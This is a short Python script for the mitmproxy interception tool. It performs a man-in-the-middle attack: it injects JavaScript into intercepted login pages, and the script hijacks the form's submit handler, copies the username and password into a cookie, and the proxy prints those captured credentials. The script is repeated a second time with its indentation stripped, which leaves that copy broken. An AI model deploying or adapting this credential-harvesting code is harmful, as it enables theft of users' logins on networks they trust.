vuryleo/mitm.py

## mitm.py
from libmproxy.encoding import *

payload = """
<script>
    $('#login_form').attr('onsubmit', 'xss();return false');
    var xss = function () {
        console.log($('#pass').val());
        $.cookie('xss', '' + $('#uname').val() + ':' + $('#pass').val(), {path: '/cgi-bin/do_login', expires: 42})
        do_login()
    };
</script>
</body>
"""


def response(context, flow):
    flow.response.headers["xss"] = ["xss"]
    res = flow.response.content
    if res.find('</body>') == -1:
        res = decode('gzip', res)
        res = res.replace('</body>', payload)
        res = encode('gzip', res)
    else:
        res = res.replace('</body>', payload)
    flow.response.content = res

def request(context, flow):
    for cookie in flow.request.headers["cookie"]:
        if cookie.find('xss') != -1:
            print cookie
	from libmproxy.encoding import *

	payload = """
	<script>
	$('#login_form').attr('onsubmit', 'xss();return false');
	var xss = function () {
	console.log($('#pass').val());
	$.cookie('xss', '' + $('#uname').val() + ':' + $('#pass').val(), {path: '/cgi-bin/do_login', expires: 42})
	do_login()
	};
	</script>
	</body>
	"""


	def response(context, flow):
	flow.response.headers["xss"] = ["xss"]
	res = flow.response.content
	if res.find('</body>') == -1:
	res = decode('gzip', res)
	res = res.replace('</body>', payload)
	res = encode('gzip', res)
	else:
	res = res.replace('</body>', payload)
	flow.response.content = res

	def request(context, flow):
	for cookie in flow.request.headers["cookie"]:
	if cookie.find('xss') != -1:
	print cookie